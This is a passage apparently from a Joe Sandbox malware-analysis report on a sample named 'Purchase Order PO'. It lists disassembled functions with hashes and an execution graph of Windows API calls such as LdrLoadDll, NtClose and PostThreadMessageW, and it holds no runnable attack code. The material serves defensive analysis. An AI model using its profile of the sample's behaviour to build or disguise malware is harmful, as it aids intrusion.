                                                              Function 02BFD1CF Relevance: .1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2069314043.0000000002BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BFD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2bfd000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                              • Instruction ID: 1ea94fe94f7d6bbbe99b38ef445f7e4e783a5c1f20708a6f92b606d3f5539ec1
                                                              • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                              • Instruction Fuzzy Hash: 6411BB75504280DFCB02CF10C5C4B15FBA1FB84214F24C6AAD9894B296C33AD40ACBA2
                                                              Function 012FD745 Relevance: .0, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2069222307.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12fd000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5b4431ae7038eb67478e0865341b641a2661de3d146489c7441b404e27656634
                                                              • Instruction ID: 051797385103d6cc5a0c94b205cad1c769c02127a21d7005e67577a14281d485
                                                              • Opcode Fuzzy Hash: 5b4431ae7038eb67478e0865341b641a2661de3d146489c7441b404e27656634
                                                              • Instruction Fuzzy Hash: D7012B310143889AE7259E99CD84B67FF9CEF45320F18C53EEF080E296D2799801CA71
                                                              Function 012FD744 Relevance: .0, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2069222307.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12fd000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1ec0fcd5e233bbab7c1622134795793b9134f6b863d080ff33fe7192fe042e3f
                                                              • Instruction ID: dca4d4ea416491132d0d3df3a25084f158227f13ebc53fd09fb7a83f61a1c6b3
                                                              • Opcode Fuzzy Hash: 1ec0fcd5e233bbab7c1622134795793b9134f6b863d080ff33fe7192fe042e3f
                                                              • Instruction Fuzzy Hash: AFF062714043849AE7259E1ACC88B62FF98EF85634F18C46AEE484E296C2799844CAB1

                                                              Non-executed Functions

                                                              Function 0764003A Relevance: 4.0, Strings: 3, Instructions: 237COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2073170163.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7640000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TJbq$Te]q$xb`q
                                                              • API String ID: 0-1930611328
                                                              • Opcode ID: 538a355615d9bd8b7a1e7d4a99af3d03d42b9d3afeecd6150c3c591cc0231737
                                                              • Instruction ID: e5e7ec0be2dc505475f7cfcfc3a1e52fcafe5bad7b794c922e57b2cfa428993e
                                                              • Opcode Fuzzy Hash: 538a355615d9bd8b7a1e7d4a99af3d03d42b9d3afeecd6150c3c591cc0231737
                                                              • Instruction Fuzzy Hash: ABB153B5E006288FDB58DF6AC944ADDBBF2BF88301F14C1A9D509AB364DA305E858F50
                                                              Function 0764C529 Relevance: .3, Instructions: 324COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2073170163.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7640000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9abb6e639ad9e1ebbe10c79ab2a27a8cf9afc7bcb12801803d5afe7863b7352a
                                                              • Instruction ID: 3fb06b92298af86e18a122f41379ad39ed794987e233d71473f67a45096ee42e
                                                              • Opcode Fuzzy Hash: 9abb6e639ad9e1ebbe10c79ab2a27a8cf9afc7bcb12801803d5afe7863b7352a
                                                              • Instruction Fuzzy Hash: 15E12CB4E012198FCB14DFA8C5909AEFBB2FF89305F248169D415AB356D730AD41CFA0
                                                              Function 02F70130 Relevance: .3, Instructions: 315COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2069867675.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2f70000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ccaaedbf492d478f0ca33f2aec7ac3734171e776ec86cfebbe5f403e0fd9f65f
                                                              • Instruction ID: 46fb21b91f557d1d9ce19a2b671371073c8d642a33cde37c717373b9a039cf78
                                                              • Opcode Fuzzy Hash: ccaaedbf492d478f0ca33f2aec7ac3734171e776ec86cfebbe5f403e0fd9f65f
                                                              • Instruction Fuzzy Hash: D812A6B0CC27458AD310CF66F94C18A3BB1BB86319BE04E09D261AF2E1D7B511EACF54
                                                              Function 0764EE10 Relevance: .3, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2073170163.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7640000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3b946cb41b50a1df718bf376b4da3a7c8db82c0226e90844cb4b179e8bfa1833
                                                              • Instruction ID: 1cc701934bf531f76be38636eb186ad3ab9b82771feb168b7f385b7d2352e8ec
                                                              • Opcode Fuzzy Hash: 3b946cb41b50a1df718bf376b4da3a7c8db82c0226e90844cb4b179e8bfa1833
                                                              • Instruction Fuzzy Hash: D3E11CB4E102198FCB14DFA8C5909AEFBF2FF89305F248169D815A735AD731A942CF61
                                                              Function 0764CDB8 Relevance: .3, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2073170163.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7640000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a20f6dbe4237913b682aeef18084dc30fc25dc2b39bc0a249dc05c726c60ace3
                                                              • Instruction ID: bd524bf8ec712a9f1d15d4f7b56bdae5a626293942be16264840a8d4a13848ca
                                                              • Opcode Fuzzy Hash: a20f6dbe4237913b682aeef18084dc30fc25dc2b39bc0a249dc05c726c60ace3
                                                              • Instruction Fuzzy Hash: B3E11BB4E102198FCB14DFA9C5909AEFBF2FF89305F248169D915AB35AD730A941CF60
                                                              Function 0764E9D8 Relevance: .3, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2073170163.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7640000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 195bbd365e5dd5ffa162f09db0d3fe9274d7737c9ee058f8e3cbcebe82dc50f2
                                                              • Instruction ID: 56c28ad60dfa474a227a88ca26536edfcc07c851f50e854f95ac918d2a0b6372
                                                              • Opcode Fuzzy Hash: 195bbd365e5dd5ffa162f09db0d3fe9274d7737c9ee058f8e3cbcebe82dc50f2
                                                              • Instruction Fuzzy Hash: ABE1FBB4E102198FCB14DFA9C5809AEFBF2FF89305F248169D815AB35AD731A941CF61
                                                              Function 0764C980 Relevance: .3, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2073170163.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7640000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 802a8ffa320e5678c727458d0341c2b2bcae30a7ebb6d374be57519031f13a6e
                                                              • Instruction ID: eb94435e2a87528f59c974cb99f43b16904093cada70582cb63352a82e241f28
                                                              • Opcode Fuzzy Hash: 802a8ffa320e5678c727458d0341c2b2bcae30a7ebb6d374be57519031f13a6e
                                                              • Instruction Fuzzy Hash: 35E13AB4E112198FCB14DFA8C5809AEFBF2FF89305F248169D815AB35AC731A941CF61
                                                              Function 07643878 Relevance: .3, Instructions: 275COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2073170163.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7640000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aa4b4fda4737993465873f47c3fa19269914ec84b946f3966275af98edbc9a4f
                                                              • Instruction ID: acb565d82140d6fcb7c3300a929f5a880fbfef9f789eb9d4a29f8ada4bd45e51
                                                              • Opcode Fuzzy Hash: aa4b4fda4737993465873f47c3fa19269914ec84b946f3966275af98edbc9a4f
                                                              • Instruction Fuzzy Hash: 21D12531C2075A8ACB01EB68D950ADDB7B1FF95300F11CBAAD14977624EF706AC9CB91
                                                              Function 07643888 Relevance: .3, Instructions: 264COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2073170163.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7640000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7ea52cdafb4cb765bfab2d16516eaa9626b84fe8107b485cf0072a7377cc6f14
                                                              • Instruction ID: 3b2c8e824df06535c63033fa386988082aa9769d72977652cf04202a9e167cd5
                                                              • Opcode Fuzzy Hash: 7ea52cdafb4cb765bfab2d16516eaa9626b84fe8107b485cf0072a7377cc6f14
                                                              • Instruction Fuzzy Hash: 5DD11631D2065A8ACB11EF64D950ADDB3B1FF95300F10CBAAD14977624EF706AC9CB91
                                                              Function 02D8D524 Relevance: .3, Instructions: 264COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2069510541.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2d80000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a8b319f8610dece8fef1f765c70277d4216d9da68c8ee436ddf00d9dbfa60320
                                                              • Instruction ID: 8e7624613f5c212dd5794d0a1ba5278a395fefb711d03f44f0dddc35ee2c73c5
                                                              • Opcode Fuzzy Hash: a8b319f8610dece8fef1f765c70277d4216d9da68c8ee436ddf00d9dbfa60320
                                                              • Instruction Fuzzy Hash: 13A14B32E002099FCF05EFB5C8405AEB7B2FF85304B65456AE805AB365DB71DD56CB50
                                                              Function 02F70120 Relevance: .2, Instructions: 222COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2069867675.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2f70000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4b1dc28586d6bb9a2a834c87ecee487e9be2efaf235d5837e10d815e6332777a
                                                              • Instruction ID: 647924106c2dd416800646297524763cb23727e0400be1ca6a2392d1c06d3f58
                                                              • Opcode Fuzzy Hash: 4b1dc28586d6bb9a2a834c87ecee487e9be2efaf235d5837e10d815e6332777a
                                                              • Instruction Fuzzy Hash: 6DC1E9B0CC27458BD710CF66F84818A7BB1BB86315BE14E09D161AB2E4DBB414EACF54
                                                              Function 0764CDAB Relevance: .1, Instructions: 140COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2073170163.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7640000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 07953c6dad28e3184d060b5a77f9bc8d3b1ae1d4c4278d6552651258b5eb803e
                                                              • Instruction ID: a0497dd280183b3dddc8f7ac1f540aae3f49d3430c280d8c78da34ae550b4ac5
                                                              • Opcode Fuzzy Hash: 07953c6dad28e3184d060b5a77f9bc8d3b1ae1d4c4278d6552651258b5eb803e
                                                              • Instruction Fuzzy Hash: 73510BB4E012198FCB14DFA9C5805AEFBF2BF89305F2481AAD419A7316D7319941CFA1

                                                              Execution Graph

                                                              Execution Coverage:1.3%
                                                              Dynamic/Decrypted Code Coverage:5%
                                                              Signature Coverage:8.6%
                                                              Total number of Nodes:139
                                                              Total number of Limit Nodes:9
                                                              execution_graph 90412 424ce3 90416 424cfc 90412->90416 90413 424d47 90420 42e743 90413->90420 90416->90413 90417 424d87 90416->90417 90419 424d8c 90416->90419 90418 42e743 RtlFreeHeap 90417->90418 90418->90419 90423 42c9e3 90420->90423 90422 424d57 90424 42c9fd 90423->90424 90425 42ca0e RtlFreeHeap 90424->90425 90425->90422 90426 42f7e3 90427 42f7f3 90426->90427 90428 42f7f9 90426->90428 90431 42e823 90428->90431 90430 42f81f 90434 42c993 90431->90434 90433 42e83e 90433->90430 90435 42c9ad 90434->90435 90436 42c9be RtlAllocateHeap 90435->90436 90436->90433 90543 424953 90544 42496f 90543->90544 90545 424997 90544->90545 90546 4249ab 90544->90546 90547 42c663 NtClose 90545->90547 90548 42c663 NtClose 90546->90548 90549 4249a0 90547->90549 90550 4249b4 90548->90550 90553 42e863 RtlAllocateHeap 90550->90553 90552 4249bf 90553->90552 90554 42bc73 90555 42bc90 90554->90555 90558 fc2df0 LdrInitializeThunk 90555->90558 90556 42bcb8 90558->90556 90437 41b223 90438 41b267 90437->90438 90439 41b288 90438->90439 90441 42c663 90438->90441 90442 42c67d 90441->90442 90443 42c68e NtClose 90442->90443 90443->90439 90444 413ca3 90445 413cc9 90444->90445 90447 413cf3 90445->90447 90448 413a23 90445->90448 90449 413a3f 90448->90449 90452 42c903 90449->90452 90453 42c91d 90452->90453 90456 fc2c70 LdrInitializeThunk 90453->90456 90454 413a45 90454->90447 90456->90454 90559 41a4d3 90560 41a542 90559->90560 90561 41a4e8 90559->90561 90561->90560 90563 41e433 90561->90563 90564 41e459 90563->90564 90568 41e54d 90564->90568 90569 42f913 90564->90569 90566 41e4ee 90567 42bcc3 LdrInitializeThunk 90566->90567 90566->90568 90567->90568 90568->90560 90570 42f883 90569->90570 90571 42e823 RtlAllocateHeap 90570->90571 90572 42f8e0 90570->90572 90573 42f8bd 90571->90573 90572->90566 90574 42e743 RtlFreeHeap 90573->90574 90574->90572 90575 413f93 90576 413fad 90575->90576 90577 413fcb 90576->90577 90581 417723 90576->90581 90579 414010 90577->90579 90580 413fff PostThreadMessageW 90577->90580 90580->90579 90583 417747 90581->90583 90582 41774e 90582->90577 90583->90582 90584 417783 LdrLoadDll 90583->90584 90585 41779a 90583->90585 90584->90585 90585->90577 90457 401b04 90458 401b19 90457->90458 90458->90458 90461 42fcb3 90458->90461 90464 42e2f3 90461->90464 90465 42e319 90464->90465 90476 4072e3 90465->90476 90467 42e32f 90468 401c17 90467->90468 90479 41b033 90467->90479 90470 42e34e 90471 42e363 90470->90471 90494 42ca33 90470->90494 90490 428203 90471->90490 90474 42e37d 90475 42ca33 ExitProcess 90474->90475 90475->90468 90478 4072f0 90476->90478 90497 4163e3 90476->90497 90478->90467 90480 41b05f 90479->90480 90515 41af23 90480->90515 90483 41b0a4 90486 41b0c0 90483->90486 90488 42c663 NtClose 90483->90488 90484 41b08c 90485 41b097 90484->90485 90487 42c663 NtClose 90484->90487 90485->90470 90486->90470 90487->90485 90489 41b0b6 90488->90489 90489->90470 90491 428265 90490->90491 90493 428272 90491->90493 90526 418583 90491->90526 90493->90474 90495 42ca4d 90494->90495 90496 42ca5e ExitProcess 90495->90496 90496->90471 90498 416400 90497->90498 90500 416419 90498->90500 90501 42d0d3 90498->90501 90500->90478 90503 42d0ed 90501->90503 90502 42d11c 90502->90500 90503->90502 90508 42bcc3 90503->90508 90506 42e743 RtlFreeHeap 90507 42d195 90506->90507 90507->90500 90509 42bce0 90508->90509 90512 fc2c0a 90509->90512 90510 42bd0c 90510->90506 90513 fc2c1f LdrInitializeThunk 90512->90513 90514 fc2c11 90512->90514 90513->90510 90514->90510 90516 41af3d 90515->90516 90520 41b019 90515->90520 90521 42bd63 90516->90521 90519 42c663 NtClose 90519->90520 90520->90483 90520->90484 90522 42bd80 90521->90522 90525 fc35c0 LdrInitializeThunk 90522->90525 90523 41b00d 90523->90519 90525->90523 90528 4185ad 90526->90528 90527 418aab 90527->90493 90528->90527 90534 413c03 90528->90534 90530 4186da 90530->90527 90531 42e743 RtlFreeHeap 90530->90531 90532 4186f2 90531->90532 90532->90527 90533 42ca33 ExitProcess 90532->90533 90533->90527 90536 413c23 90534->90536 90537 413c8c 90536->90537 90539 41b343 RtlFreeHeap LdrInitializeThunk 90536->90539 90537->90530 90538 413c82 90538->90530 90539->90538 90540 418cc8 90541 42c663 NtClose 90540->90541 90542 418cd2 90541->90542 90586 fc2b60 LdrInitializeThunk

                                                              Executed Functions

                                                              Function 00417723 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 356 417723-41774c call 42f323 359 417752-417760 call 42f923 356->359 360 41774e-417751 356->360 363 417770-417781 call 42ddc3 359->363 364 417762-41776d call 42fbc3 359->364 369 417783-417797 LdrLoadDll 363->369 370 41779a-41779d 363->370 364->363 369->370
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417795
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2437240336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_Purchase Order PO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                              • Instruction ID: c8367a89be375ba73a30cdb688ded44f01425706de2ca614d69ed47fcf1ac29a
                                                              • Opcode Fuzzy Hash: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                              • Instruction Fuzzy Hash: 49010CB5E00209BBDB10DBE5DC42FDEB7789B54308F4041AAA91897281FA35EB588B95
                                                              Function 0042C663 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 376 42c663-42c69c call 404783 call 42d8c3 NtClose
                                                              APIs
                                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C697
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2437240336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_Purchase Order PO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                              • Instruction ID: 55d98cbac179b72a764dd86cd5ec1f11a461976065f381c4f300eafe1b6f3ecb
                                                              • Opcode Fuzzy Hash: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                              • Instruction Fuzzy Hash: E8E086326402147BD210FB6ADC41FD7776CDFC5714F00451AFA1867242C6757A1587F5
                                                              Function 00FC2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 390 fc2b60-fc2b6c LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: eeb0296b3e1ee299117bd39c8c64b1fcee87c52d040e796980825206456e6df0
                                                              • Instruction ID: 9005a8f9c6f5206a0e8458a9cd9643fd20c806ebeceb3a12afa35a6637ea4b27
                                                              • Opcode Fuzzy Hash: eeb0296b3e1ee299117bd39c8c64b1fcee87c52d040e796980825206456e6df0
                                                              • Instruction Fuzzy Hash: 079002652024101342057158841461A401B87E0341B59C033E10145A0EC92989927125
                                                              Function 00FC2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 391 fc2c70-fc2c7c LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: ef7e42b6a46f5379e4e85d1abe4de7a27fc18f426c37321e356142ebdb227757
                                                              • Instruction ID: 95426218983a0de8357c45d6b0d16c7c1c6e6d3978c40881e405d08218a4901c
                                                              • Opcode Fuzzy Hash: ef7e42b6a46f5379e4e85d1abe4de7a27fc18f426c37321e356142ebdb227757
                                                              • Instruction Fuzzy Hash: 8890023520149812D2107158C40474E001687D0341F5DC423A4424668E8A9989927121
                                                              Function 00FC2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: b919c1a64f67162531feb4f093a44ae6f36d5e507563a483f6af62b18b40c1b6
                                                              • Instruction ID: 2959e3cc8f2bf0787db7e1704b2aee03464d78814cfc7b8e45948676f2d2ed46
                                                              • Opcode Fuzzy Hash: b919c1a64f67162531feb4f093a44ae6f36d5e507563a483f6af62b18b40c1b6
                                                              • Instruction Fuzzy Hash: 8E90023520141423D2117158850470B001A87D0381F99C423A0424568E9A5A8A53B121
                                                              Function 00FC35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 7115e25b4bcf42ccb048b9b5fd5987dd5d14117dd6236f21a73bf003d06dfdf3
                                                              • Instruction ID: b25afad3a6c0e877af5ef1a1c5d7d5bc4179cb93d9055051b7fbcb1d37c6940d
                                                              • Opcode Fuzzy Hash: 7115e25b4bcf42ccb048b9b5fd5987dd5d14117dd6236f21a73bf003d06dfdf3
                                                              • Instruction Fuzzy Hash: 3790023560551412D2007158851470A101687D0341F69C423A0424578E8B998A5275A2
                                                              Function 00413F8F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • PostThreadMessageW.USER32(l420377x,00000111,00000000,00000000), ref: 0041400A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2437240336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_Purchase Order PO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: S$l420377x$l420377x
                                                              • API String ID: 1836367815-2727433438
                                                              • Opcode ID: 359c6fffe9613725b5ac8c672145e67f63efc52315c8541c79e7ad6c697c6183
                                                              • Instruction ID: c2806ac613a218a9f43bc075071cdee210e11ad5ac0fb3b5002561ad8e7d22f2
                                                              • Opcode Fuzzy Hash: 359c6fffe9613725b5ac8c672145e67f63efc52315c8541c79e7ad6c697c6183
                                                              • Instruction Fuzzy Hash: 43114C71D0015C7AEB10AAE69C81DEF7B7CDF4579CF448069FA0467141D27C8E064BB5
                                                              Function 00413F93 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 15 413f93-413fc5 call 42e7e3 call 42f1f3 20 413fcb-413ffd call 404733 call 424e23 15->20 21 413fc6 call 417723 15->21 26 41401d-414023 20->26 27 413fff-41400e PostThreadMessageW 20->27 21->20 27->26 28 414010-41401a 27->28 28->26
                                                              APIs
                                                              • PostThreadMessageW.USER32(l420377x,00000111,00000000,00000000), ref: 0041400A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2437240336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_Purchase Order PO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: l420377x$l420377x
                                                              • API String ID: 1836367815-444879537
                                                              • Opcode ID: c759df97fc8d8bd9950daa468166aab63e6b13b68f94bc1cf4dd968c4ef8860b
                                                              • Instruction ID: 33197e0a7dcb6eb663e71045ce9ebb9a0ec692f75d002f1c99a84e6dd662f6bc
                                                              • Opcode Fuzzy Hash: c759df97fc8d8bd9950daa468166aab63e6b13b68f94bc1cf4dd968c4ef8860b
                                                              • Instruction Fuzzy Hash: 4A0126B2D0025C7AEB10AAE69C81DEFBB7CDF44798F408069FA0467141D67C9E064BB5
                                                              Function 00413F72 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 29 413f72-413f79 30 413fb5-413ffd call 417723 call 404733 call 424e23 29->30 31 413f7b-413f87 29->31 38 41401d-414023 30->38 39 413fff-41400e PostThreadMessageW 30->39 39->38 40 414010-41401a 39->40 40->38
                                                              APIs
                                                              • PostThreadMessageW.USER32(l420377x,00000111,00000000,00000000), ref: 0041400A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2437240336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_Purchase Order PO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: l420377x$l420377x
                                                              • API String ID: 1836367815-444879537
                                                              • Opcode ID: 3262b01b000be0360b63c840c83d9d807fb3e09adfdf533a4899f21b81f85822
                                                              • Instruction ID: 07d8ccd72df32b7def514bcf1009cf5c80a90bfc08a7e37c420c6dc4dd04ca91
                                                              • Opcode Fuzzy Hash: 3262b01b000be0360b63c840c83d9d807fb3e09adfdf533a4899f21b81f85822
